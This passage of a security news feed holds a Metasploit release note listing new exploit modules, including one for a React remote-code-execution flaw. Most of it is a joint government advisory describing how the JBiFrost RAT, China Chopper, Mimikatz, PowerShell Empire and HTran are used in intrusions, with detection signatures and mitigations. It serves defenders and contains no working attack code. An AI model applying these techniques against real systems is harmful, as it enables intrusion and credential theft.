LoongArch64. The first payload introduced for this new architecture is the reboot payload, which will cause the target system to restart once triggered.</p><h2>Enhanced Modules (2)</h2><p>Modules which have either been enhanced, or renamed:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20736">#20736</a> from <a href="https://github.com/sfewer-r7">sfewer-r7</a> - This pull requests updates the exploit/linux/http/fortinet_fortiweb_rce module (added in <a href="https://github.com/rapid7/metasploit-framework/pull/20717">https://github.com/rapid7/metasploit-framework/pull/20717</a>) to add in support for older version of FortiWeb, versions 6.*, which are no longer under support from the vendor.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20747">#20747</a> from <a href="https://github.com/vognik">vognik</a> - This adds an exploit for <a href="https://github.com/advisories/GHSA-fv66-9v8q-g76r">CVE-2025-55182</a> which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.</li></ul><h2>Enhancements and features (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20704">#20704</a> from <a href="https://github.com/dwelch-r7">dwelch-r7</a> - The module auxiliary/scanner/ssh/ssh_login_pubkey has been removed. Its functionality has been moved into auxiliary/scanner/ssh/ssh_login.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-12-05T16%3A17%3A18Z..2025-12-10T17%3A05%3A19Z%22">Pull Requests 6.4.101...6.4.102</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.101...6.4.102">Full diff 6.4.101...6.4.102</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Proaktive IT-Security mit Pentesting: Ethical Hacking für Admins | heise online]]></title>
<description><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem Hacker identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></description>
<link>https://tsecurity.de/de/3155487/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3155487/hacking/proaktive-it-security-mit-pentesting-ethical-hacking-fuer-admins-heise-online/</guid>
<pubDate>Fri, 12 Dec 2025 14:50:36 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein besonderer Fokus liegt auf dem Exploit-Framework Metasploit, mit dem <b>Hacker</b> identifizierte Schwachstellen gezielt ausnutzen. Härtung interner und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Publicly Available Tools Seen in Cyber Incidents Worldwide]]></title>
<description><![CDATA[Summary

This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5]
In it we highlight the use of five publicly available tools, which have been used for malicious purp...]]></description>
<link>https://tsecurity.de/de/3154013/sicherheitsluecken/publicly-available-tools-seen-in-cyber-incidents-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3154013/sicherheitsluecken/publicly-available-tools-seen-in-cyber-incidents-worldwide/</guid>
<pubDate>Thu, 11 Dec 2025 23:06:27 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<h2><strong>Summary</strong></h2>
</div>
<p>This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5]</p>
<p>In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are:</p>
<ol>
<li>Remote Access Trojan: JBiFrost</li>
<li>Webshell: China Chopper</li>
<li>Credential Stealer: Mimikatz</li>
<li>Lateral Movement Framework: PowerShell Empire</li>
<li>C2 Obfuscation and Exfiltration: HUC Packet Transmitter</li>
</ol>
<p>To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.</p>
<p>The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense.</p>
<p>Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals.</p>
<p>The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution.</p>
<p>Experience from all our countries makes it clear that, while cyber threat actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated threat actor groups use common, publicly available tools to achieve their objectives.</p>
<p>Whatever these objectives may be, initial compromises of victim systems are often established through exploitation of common security weaknesses. Abuse of unpatched software vulnerabilities or poorly configured systems are common ways for a threat actor to gain access. The tools detailed in this Activity Alert come into play once a compromise has been achieved, enabling attackers to further their objectives within the victim’s systems.</p>
<h3>How to Use This Report</h3>
<p>The tools detailed in this Activity Alert fall into five categories: Remote Access Trojans (RATs), webshells, credential stealers, lateral movement frameworks, and command and control (C2) obfuscators.</p>
<p>This Activity Alert provides an overview of the threat posed by each tool, along with insight into where and when it has been deployed by threat actors. Measures to aid detection and limit the effectiveness of each tool are also described.</p>
<p>The Activity Alert concludes with general advice for improving network defense practices.</p>
<div>
<h2><strong>Technical Details</strong></h2>
</div>
<h3>Remote Access Trojan: JBiFrost</h3>
<p>First observed in May 2015, the JBiFrost RAT is a variant of the Adwind RAT, with roots stretching back to the Frutas RAT from 2012.</p>
<p>A RAT is a program that, once installed on a victim’s machine, allows remote administrative control. In a malicious context, it can—among many other functions—be used to install backdoors and key loggers, take screen shots, and exfiltrate data.</p>
<p>Malicious RATs can be difficult to detect because they are normally designed not to appear in lists of running programs and can mimic the behavior of legitimate applications.</p>
<p>To prevent forensic analysis, RATs have been known to disable security measures (e.g., Task Manager) and network analysis tools (e.g., Wireshark) on the victim’s system.</p>
<h4><strong>In Use</strong></h4>
<p>JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.</p>
<p>Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.</p>
<p>Threat actors have repeatedly compromised servers in our countries with the purpose of delivering malicious RATs to victims, either to gain remote access for further exploitation, or to steal valuable information such as banking credentials, intellectual property, or PII.</p>
<h4><strong>Capabilities</strong></h4>
<p>JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.</p>
<p>JBiFrost RAT allows threat actors to pivot and move laterally across a network or install additional malicious software. It is primarily delivered through emails as an attachment, usually an invoice notice, request for quotation, remittance notice, shipment notification, payment notice, or with a link to a file hosting service.</p>
<p>Past infections have exfiltrated intellectual property, banking credentials, and personally identifiable information (PII). Machines infected with JBiFrost RAT can also be used in botnets to carry out distributed denial-of-service attacks.</p>
<h4><strong>Examples</strong></h4>
<p>Since early 2018, we have observed an increase in JBiFrost RAT being used in targeted attacks against critical national infrastructure owners and their supply chain operators. There has also been an increase in the RAT’s hosting on infrastructure located in our countries.</p>
<p>In early 2017, Adwind RAT was deployed via spoofed emails designed to look as if they originated from Society for Worldwide Interbank Financial Telecommunication, or SWIFT, network services.</p>
<p>Many other publicly available RATs, including variations of Gh0st RAT, have also been observed in use against a range of victims worldwide.</p>
<h4><strong>Detection and Protection</strong></h4>
<p>Some possible indications of a JBiFrost RAT infection can include, but are not limited to:</p>
<ul>
<li>Inability to restart the computer in safe mode,</li>
<li>Inability to open the Windows Registry Editor or Task Manager,</li>
<li>Significant increase in disk activity and/or network traffic,</li>
<li>Connection attempts to known malicious Internet Protocol (IP) addresses, and</li>
<li>Creation of new files and directories with obfuscated or random names.</li>
</ul>
<p>Protection is best afforded by ensuring systems and installed applications are all fully patched and updated. The use of a modern antivirus program with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks. You should ensure that your organization is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently.</p>
<p>Strict application allow listing is recommended to prevent infections from occurring.</p>
<p>The initial infection mechanism for RATs, including JBiFrost RAT, can be via phishing emails. You can help prevent JBiFrost RAT infections by stopping these phishing emails from reaching your users, helping users to identify and report phishing emails, and implementing security controls so that the malicious email does not compromise your device. The United Kingdom National Cyber Security Centre (UK NCSC) has published <a href="https://www.ncsc.gov.uk/guidance/phishing" target="_blank" title="Phishing attacks: defending your organisation">phishing guidance</a>.</p>
<h3>Webshell: China Chopper</h3>
<p>China Chopper is a publicly available, well-documented webshell that has been in widespread use since 2012.</p>
<p>Webshells are malicious scripts that are uploaded to a target host after an initial compromise and grant a threat actor remote administrative capability.</p>
<p>Once this access is established, webshells can also be used to pivot to additional hosts within a network.</p>
<h4><strong>In Use</strong></h4>
<p>China Chopper is extensively used by threat actors to remotely access compromised web servers, where it provides file and directory management, along with access to a virtual terminal on the compromised device.</p>
<p>As China Chopper is just 4 KB in size and has an easily modifiable payload, detection and mitigation are difficult for network defenders.</p>
<h4><strong>Capabilities</strong></h4>
<p>China Chopper has two main components: the China Chopper client-side, which is run by the attacker, and the China Chopper server, which is installed on the victim web server but is also attacker-controlled.</p>
<p>The webshell client can issue terminal commands and manage files on the victim server. Its MD5 hash is publicly available (originally posted on hxxp://www.maicaidao.com).</p>
<p>The MD5 hash of the web client is shown in table 1 below.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption>Table 1: China Chopper webshell client MD5 hash</caption>
<thead>
<tr>
<th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Webshell Client</strong></th>
<th scope="col" role="columnheader"><strong>MD5 Hash</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>caidao.exe</td>
<td>5001ef50c7e869253a7c152a638eab8a</td>
</tr>
</tbody>
</table>
<p>The webshell server is uploaded in plain text and can easily be changed by the attacker. This makes it harder to define a specific hash that can identify adversary activity. In summer 2018, threat actors were observed targeting public-facing web servers that were vulnerable to CVE-2017-3066. The activity was related to a vulnerability in the web application development platform Adobe ColdFusion, which enabled remote code execution.</p>
<p>China Chopper was intended as the second-stage payload, delivered once servers had been compromised, allowing the threat actor remote access to the victim host. After successful exploitation of a vulnerability on the victim machine, the text-based China Chopper is placed on the victim web server. Once uploaded, the webshell server can be accessed by the threat actor at any time using the client application. Once successfully connected, the threat actor proceeds to manipulate files and data on the web server.</p>
<p>China Chopper’s capabilities include uploading and downloading files to and from the victim using the file-retrieval tool <code>wget</code> to download files from the internet to the target; and editing, deleting, copying, renaming, and even changing the timestamp, of existing files.</p>
<h4><strong>Detection and protection</strong></h4>
<p>The most powerful defense against a webshell is to avoid the web server being compromised in the first place. Ensure that all the software running on public-facing web servers is up-to-date with security patches applied. Audit custom applications for common web vulnerabilities. [<a href="https://owasp.org/www-project-top-ten/" target="_blank" title="OWASP Top Ten">6</a>]</p>
<p>One attribute of China Chopper is that every action generates a hypertext transfer protocol (HTTP) POST. This can be noisy and is easily spotted if investigated by a network defender.</p>
<p>While the China Chopper webshell server upload is plain text, commands issued by the client are Base64 encoded, although this is easily decodable.</p>
<p>The adoption of Transport Layer Security (TLS) by web servers has resulted in web server traffic becoming encrypted, making detection of China Chopper activity using network-based tools more challenging.</p>
<p>The most effective way to detect and mitigate China Chopper is on the host itself—specifically on public-facing web servers. There are simple ways to search for the presence of the web-shell using the command line on both Linux and Windows based operating systems. [<a href="https://cloud.google.com/blog/topics/threat-intelligence/breaking-down-the-china-chopper-web-shell-part-ii/" title="Breaking Down the China Chopper Web Shell - Part II">7</a>]</p>
<p>To detect webshells more broadly, network defenders should focus on spotting either suspicious process execution on web servers (e.g., Hypertext Preprocessor [PHP] binaries spawning processes) and out-of-pattern outbound network connections from web servers. Typically, web servers make predictable connections to an internal network. Changes in those patterns may indicate the presence of a web shell. You can manage network permissions to prevent web-server processes from writing to directories where PHP can be executed, or from modifying existing files.</p>
<p>We also recommend that you use web access logs as a source of monitoring, such as through traffic analytics. Unexpected pages or changes in traffic patterns can be early indicators.</p>
<h3>Credential Stealer: Mimikatz</h3>
<p>Developed in 2007, Mimikatz is mainly used by attackers to collect the credentials of other users, who are logged into a targeted Windows machine. It does this by accessing the credentials in memory within a Windows process called Local Security Authority Subsystem Service (LSASS).</p>
<p>These credentials, either in plain text, or in hashed form, can be reused to give access to other machines on a network.</p>
<p>Although it was not originally intended as a hacking tool, in recent years Mimikatz has been used by multiple actors for malicious purposes. Its use in compromises around the world has prompted organizations globally to re-evaluate their network defenses.</p>
<p>Mimikatz is typically used by threat actors once access has been gained to a host and the threat actor wishes to move throughout the internal network. Its use can significantly undermine poorly configured network security.</p>
<h4><strong>In Use</strong></h4>
<p>Mimikatz source code is publicly available, which means anyone can compile their own versions of the new tool and potentially develop new Mimikatz custom plug-ins and additional functionality.</p>
<p>Our cyber authorities have observed widespread use of Mimikatz among threat actors, including organized crime and state-sponsored groups.</p>
<p>Once a threat actor has gained local administrator privileges on a host, Mimikatz provides the ability to obtain the hashes and clear-text credentials of other users, enabling the threat actor to escalate privileges within a domain and perform many other post-exploitation and lateral movement tasks.</p>
<p>For this reason, Mimikatz has been bundled into other penetration testing and exploitation suites, such as PowerShell Empire and Metasploit.</p>
<h4><strong>Capabilities</strong></h4>
<p>Mimikatz is best known for its ability to retrieve clear text credentials and hashes from memory, but its full suite of capabilities is extensive.</p>
<p>The tool can obtain Local Area Network Manager and NT LAN Manager hashes, certificates, and long-term keys on Windows XP (2003) through Windows 8.1 (2012r2). In addition, it can perform pass-the-hash or pass-the-ticket tasks and build Kerberos “golden tickets.”</p>
<p>Many features of Mimikatz can be automated with scripts, such as PowerShell, allowing a threat actor to rapidly exploit and traverse a compromised network. Furthermore, when operating in memory through the freely available “Invoke-Mimikatz” PowerShell script, Mimikatz activity is very difficult to isolate and identify.</p>
<h4><strong>Examples</strong></h4>
<p>Mimikatz has been used across multiple incidents by a broad range of threat actors for several years. In 2011, it was used by unknown threat actors to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.</p>
<p>More recently, Mimikatz was used in conjunction with other malicious tools—in the NotPetya and BadRabbit ransomware attacks in 2017 to extract administrator credentials held on thousands of computers. These credentials were used to facilitate lateral movement and enabled the ransomware to propagate throughout networks, encrypting the hard drives of numerous systems where these credentials were valid.</p>
<p>In addition, a Microsoft research team identified use of Mimikatz during a sophisticated cyberattack targeting several high-profile technology and financial organizations. In combination with several other tools and exploited vulnerabilities, Mimikatz was used to dump and likely reuse system hashes.</p>
<h4><strong>Detection and Protection</strong></h4>
<p>Updating Windows will help reduce the information available to a threat actor from the Mimikatz tool, as Microsoft seeks to improve the protection offered in each new Windows version.</p>
<p>To prevent Mimikatz credential retrieval, network defenders should disable the storage of clear text passwords in LSASS memory. This is default behavior for Windows 8.1/Server 2012 R2 and later, but can be specified on older systems which have the relevant security patches installed.[<a href="https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649" target="_blank" title="Microsoft Security Advisory: Update to improve credentials protection and management: May 13, 2014">8</a>] Windows 10 and Windows Server 2016 systems can be protected by using newer security features, such as Credential Guard.</p>
<p>Credential Guard will be enabled by default if:</p>
<ul>
<li>The hardware meets Microsoft’s Windows Hardware Compatibility Program Specifications and Policies for Windows Server 2016 and Windows Server Semi-Annual Branch; and</li>
<li>The server is not acting as a Domain Controller.</li>
</ul>
<p>You should verify that your physical and virtualized servers meet Microsoft’s <a href="https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/" target="_blank" title="Credential Guard overview">minimum requirements for each release of Windows 10 and Windows Server</a>.</p>
<p>Password reuse across accounts, particularly administrator accounts, makes pass-the-hash attacks far simpler. You should set user policies within your organization that discourage password reuse, even across common level accounts on a network. The freely available Local Administrator Password Solution from Microsoft can allow easy management of local administrator passwords, preventing the need to set and store passwords manually.</p>
<p>Network administrators should monitor and respond to unusual or unauthorized account creation or authentication to prevent Kerberos ticket exploitation, or network persistence and lateral movement. For Windows, tools such as Microsoft Advanced Threat Analytics and Azure Advanced Threat Protection can help with this.</p>
<p>Network administrators should ensure that systems are patched and up-to-date. Numerous Mimikatz features are mitigated or significantly restricted by the latest system versions and updates. But no update is a perfect fix, as Mimikatz is continually evolving and new third-party modules are often developed.</p>
<p>Most up-to-date antivirus tools will detect and isolate non-customized Mimikatz use and should therefore be used to detect these instances. But threat actors can sometimes circumvent antivirus systems by running Mimikatz in memory, or by slightly modifying the original code of the tool. Wherever Mimikatz is detected, you should perform a rigorous investigation, as it almost certainly indicates a threat actor is actively present in the network, rather than an automated process at work.</p>
<p>Several of Mimikatz’s features rely on exploitation of administrator accounts. Therefore, you should ensure that administrator accounts are issued on an as-required basis only. Where administrative access is required, you should apply privileged access management principles.</p>
<p>Since Mimikatz can only capture the accounts of those users logged into a compromised machine, privileged users (e.g., domain administrators) should avoid logging into machines with their privileged credentials. Detailed information on securing Active Directory is available from Microsoft.[<a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory" target="_blank" title="Best Practices for Securing Active Directory">9</a>]</p>
<p>Network defenders should audit the use of scripts, particularly PowerShell, and inspect logs to identify anomalies. This will aid in identifying Mimikatz or pass-the-hash abuse, as well as in providing some mitigation against attempts to bypass detection software.</p>
<h3>Lateral Movement Framework: PowerShell Empire</h3>
<p>PowerShell Empire is an example of a post-exploitation or lateral movement tool. It is designed to allow an attacker (or penetration tester) to move around a network after gaining initial access. Other examples of these tools include Cobalt Strike and Metasploit. PowerShell Empire can also be used to generate malicious documents and executables for social engineering access to networks.</p>
<p>The PowerShell Empire framework was designed as a legitimate penetration testing tool in 2015. PowerShell Empire acts as a framework for continued exploitation once a threat actor has gained access to a system.</p>
<p>The tool provides a threat actor with the ability to escalate privileges, harvest credentials, exfiltrate information, and move laterally across a network. These capabilities make it a powerful exploitation tool. Because it is built on a common legitimate application (PowerShell) and can operate almost entirely in memory, PowerShell Empire can be difficult to detect on a network using traditional antivirus tools.</p>
<h4><strong>In Use</strong></h4>
<p>PowerShell Empire has become increasingly popular among hostile state actors and organized criminals. In recent years we have seen it used in cyber incidents globally across a wide range of sectors.</p>
<p>Initial exploitation methods vary between compromises, and threat actors can configure the PowerShell Empire uniquely for each scenario and target. This, in combination with the wide range of skill and intent within the PowerShell Empire user community, means that the ease of detection will vary. Nonetheless, having a greater understanding and awareness of this tool is a step forward in defending against its use by threat actors.</p>
<h4><strong>Capabilities</strong></h4>
<p>PowerShell Empire enables a threat actor to carry out a range of actions on a victim’s machine and implements the ability to run PowerShell scripts without needing powershell.exe to be present on the system Its communications are encrypted and its architecture is flexible.</p>
<p>PowerShell Empire uses "modules" to perform more specific malicious actions. These modules provide the threat actor with a customizable range of options to pursue their goals on the victim’s systems. These goals include escalation of privileges, credential harvesting, host enumeration, keylogging, and the ability to move laterally across a network.</p>
<p>PowerShell Empire’s ease of use, flexible configuration, and ability to evade detection make it a popular choice for threat actors of varying abilities.</p>
<h4><strong>Examples</strong></h4>
<p>During an incident in February 2018, a UK energy sector company was compromised by an unknown threat actor. This compromise was detected through PowerShell Empire beaconing activity using the tool’s default profile settings. Weak credentials on one of the victim’s administrator accounts are believed to have provided the threat actor with initial access to the network.</p>
<p>In early 2018, an unknown threat actor used Winter Olympics-themed socially engineered emails and malicious attachments in a spear-phishing campaign targeting several South Korean organizations. This attack had an additional layer of sophistication, making use of <code>Invoke-PSImage</code>, a stenographic tool that will encode any PowerShell script into an image.</p>
<p>In December 2017, APT19 targeted a multinational law firm with a phishing campaign. APT19 used obfuscated PowerShell macros embedded within Microsoft Word documents generated by PowerShell Empire.</p>
<p>Our cybersecurity authorities are also aware of PowerShell Empire being used to target academia. In one reported instance, a threat actor attempted to use PowerShell Empire to gain persistence using a Windows Management Instrumentation event consumer. However, in this instance, the PowerShell Empire agent was unsuccessful in establishing network connections due to the HTTP connections being blocked by a local security appliance.</p>
<h4><strong>Detection and Protection</strong></h4>
<p>Identifying malicious PowerShell activity can be difficult due to the prevalence of legitimate PowerShell activity on hosts and the increased use of PowerShell in maintaining a corporate environment.</p>
<p>To identify potentially malicious scripts, PowerShell activity should be comprehensively logged. This should include script block logging and PowerShell transcripts.</p>
<p>Older versions of PowerShell should be removed from environments to ensure that they cannot be used to circumvent additional logging and controls added in more recent versions of PowerShell. This page provides a good summary of PowerShell security practices.[<a href="https://reliaquest.com/blog/powershell-security-best-practices/" target="_blank" title="PowerShell Security Best Practices">10</a>]</p>
<p>The code integrity features in recent versions of Windows can be used to limit the functionality of PowerShell, preventing or hampering malicious PowerShell in the event of a successful intrusion.</p>
<p>A combination of script code signing, application allow listing, and constrained language mode will prevent or limit the effect of malicious PowerShell in the event of a successful intrusion. These controls will also impact legitimate PowerShell scripts and it is strongly advised that they be thoroughly tested before deployment.</p>
<p>When organizations profile their PowerShell usage, they often find it is only used legitimately by a small number of technical staff. Establishing the extent of this legitimate activity will make it easier to monitor and investigate suspicious or unexpected PowerShell usage elsewhere on the network.</p>
<h3>C2 Obfuscation and Exfiltration: HUC Packet Transmitter </h3>
<p>Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools (e.g., Tor) or more specific tools to obfuscate their location.</p>
<p>HUC Packet Transmitter (HTran) is a proxy tool used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009.</p>
<p>HTran facilitates TCP connections between the victim and a hop point controlled by a threat actor. Malicious threat actors can use this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network.</p>
<h4><strong>In Use</strong></h4>
<p>The use of HTran has been regularly observed in compromises of both government and industry targets.</p>
<p>A broad range of threat actors have been observed using HTran and other connection proxy tools to</p>
<ul>
<li>Evade intrusion and detection systems on a network,</li>
<li>Blend in with common traffic or leverage domain trust relationships to bypass security controls,</li>
<li>Obfuscate or hide C2 infrastructure or communications, and</li>
<li>Create peer-to-peer or meshed C2 infrastructure to evade detection and provide resilient connections to infrastructure.</li>
</ul>
<h4><strong>Capabilities</strong></h4>
<p>HTran can run in several modes, each of which forwards traffic across a network by bridging two TCP sockets. They differ in terms of where the TCP sockets are initiated from, either locally or remotely. The three modes are</p>
<ul>
<li><strong>Server (listen)</strong> – Both TCP sockets initiated remotely;</li>
<li><strong>Client (slave) </strong>– Both TCP sockets initiated locally; and</li>
<li><strong>Proxy (tran)</strong> – One TCP socket initiated remotely, the other initiated locally, upon receipt of traffic from the first connection.</li>
</ul>
<p>HTran can inject itself into running processes and install a rootkit to hide network connections from the host operating system. Using these features also creates Windows registry entries to ensure that HTran maintains persistent access to the victim network.</p>
<h4><strong>Examples</strong></h4>
<p>Recent investigations by our cybersecurity authorities have identified the use of HTran to maintain and obfuscate remote access to targeted environments.</p>
<p>In one incident, the threat actor compromised externally-facing web servers running outdated and vulnerable web applications. This access enabled the upload of webshells, which were then used to deploy other tools, including HTran.</p>
<p>HTran was installed into the ProgramData directory and other deployed tools were used to reconfigure the server to accept Remote Desktop Protocol (RDP) communications.</p>
<p>The threat actor issued a command to start HTran as a client, initiating a connection to a server located on the internet over port 80, which forwards RDP traffic from the local interface.</p>
<p>In this case, HTTP was chosen to blend in with other traffic that was expected to be seen originating from a web server to the internet. Other well-known ports used included:</p>
<ul>
<li>Port 53 – Domain Name System</li>
<li>Port 443 - HTTP over TLS/Secure Sockets Layer</li>
<li>Port 3306 - MySQL</li>
<li>By using HTran in this way, the threat actor was able to use RDP for several months without being detected.</li>
</ul>
<h4><strong>Detection and Protection</strong></h4>
<p>Attackers need access to a machine to install and run HTran, so network defenders should apply security patches and use good access control to prevent attackers from installing malicious applications.</p>
<p><a href="https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes" target="_blank" title="Introduction to logging for security purposes">Network monitoring</a> and firewalls can help prevent and detect unauthorized connections from tools such as HTran.</p>
<p>In some of the samples analyzed, the rootkit component of HTran only hides connection details when the proxy mode is used. When client mode is used, defenders can view details about the TCP connections being made.</p>
<p>HTran also includes a debugging condition that is useful for network defenders. In the event that a destination becomes unavailable, HTran generates an error message using the following format:</p>
<div><code>sprint(buffer, “[SERVER]connection to %s:%d error\r\n”, host, port2);</code></div>
<p>This error message is relayed to the connecting client in the clear. Network defenders can monitor for this error message to potentially detect HTran instances active in their environments.</p>
<div>
<h2><strong>Mitigations</strong></h2>
</div>
<p>There are several measures that will improve the overall cybersecurity of your organization and help protect it against the types of tools highlighted in this report. Network defenders are advised to seek further information using the links below.</p>
<ul>
<li>Protect your organization from malware.<br>See NCCIC Guidance: https://www.us-cert.gov/ncas/tips/ST13-003.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/small-business-guide/protecting-your-organisation-malware" target="_blank" title="Small Business Guide: Cyber Security">Small Business Guide: Cyber Security</a>.</li>
<li>Board toolkit: five question for your board’s agenda.<br>See UK NCSC Guidance: https://www.ncsc.gov.uk/guidance/board-toolkit-five-questions-your-boards-agenda.</li>
<li>Use a strong password policy and multifactor authentication (also known as two-factor authentication or two-step authentication) to reduce the impact of password compromises.<br>See NCCIC Guidance: <a href="https://www.cisa.gov/MFA">More than a Password</a>.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/mfa-for-your-corporate-online-services" target="_blank" title="Multi-factor authentication for your corporate online services">Multi-factor authentication for your corporate online services</a> and <a href="https://www.ncsc.gov.uk/guidance/setting-2-step-verification-2sv" target="_blank" title="Setting up 2-Step Verification (2SV)">Setting up 2-Step Verification (2SV)</a>.</li>
<li>Protect your devices and networks by keeping them up to date. Use the latest supported versions, apply security patches promptly, use antivirus and scan regularly to guard against known malware threats.<br>See NCCIC Guidance: <a href="https://www.cisa.gov/news-events/news/understanding-patches-and-software-updates" title="Understanding Patches and Software Updates">Understanding Patches and Software Updates</a>.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks" target="_blank" title="Mitigating malware and ransomware attacks">Mitigating malware and ransomware attacks</a>.</li>
<li>Prevent and detect lateral movement in your organization’s networks.<br>See UK NCSC Guidance: <a href="https://www.cisa.gov//www.ncsc.gov.uk/guidance/preventing-lateral-movement" target="_blank" title="Preventing Lateral Movement">Preventing Lateral Movement</a>.</li>
<li>Implement architectural controls for network segregation.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/10-steps/architecture-and-configuration" target="_blank" title="Architecture and configuration">Architecture and configuration</a>.</li>
<li>Protect the management interfaces of your critical operational systems. In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets.<br>See UK NCSC blog post: <a href="https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces" title="Protect your management interfaces">Protect your management interfaces</a>.</li>
<li>Set up a security monitoring capability so you are collecting the data that will be needed to analyze network intrusions.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes" target="_blank" title="Introduction to logging for security purposes">Introduction to logging for security purposes</a>.</li>
<li>Review and refresh your incident management processes.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/10-steps/incident-management" target="_blank" title="Incident management">Incident management</a>.</li>
<li>Update your systems and software. Ensure your operating system and productivity applications are up to date. Users with Microsoft Office 365 licensing can use “click to run” to keep their office applications seamlessly updated.</li>
<li>Use modern systems and software. These have better security built-in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/device-security-guidance/managing-deployed-devices/obsolete-products" target="_blank" title="Obsolete products">Obsolete products</a>.</li>
<li>Manage bulk personal datasets properly.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/protecting-bulk-personal-data" target="_blank" title="Protecting bulk personal data">Protecting bulk personal data</a>.</li>
<li>Restrict intruders' ability to move freely around your systems and networks. Pay particular attention to potentially vulnerable entry points (e.g., third-party systems with onward access to your core network). During an incident, disable remote access from third-party systems until you are sure they are clean.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/guidance/preventing-lateral-movement" target="_blank" title="Preventing Lateral Movement">Preventing Lateral Movement</a> and <a href="https://www.ncsc.gov.uk/collection/supply-chain-security/assessing-supply-chain-security" target="_blank" title="Supply chain security guidance">Assessing supply chain security</a>.</li>
<li>Allow list applications. If supported by your operating environment, consider allow listing of permitted applications. This will help prevent malicious applications from running.<br>See UK NCSC Guidance: <a href="https://www.ncsc.gov.uk/collection/device-security-guidance/platform-guides/windows#applicationwhitelistingsection" target="_blank" title="Windows - Device security guidance">Device security guidance - Windows</a>.</li>
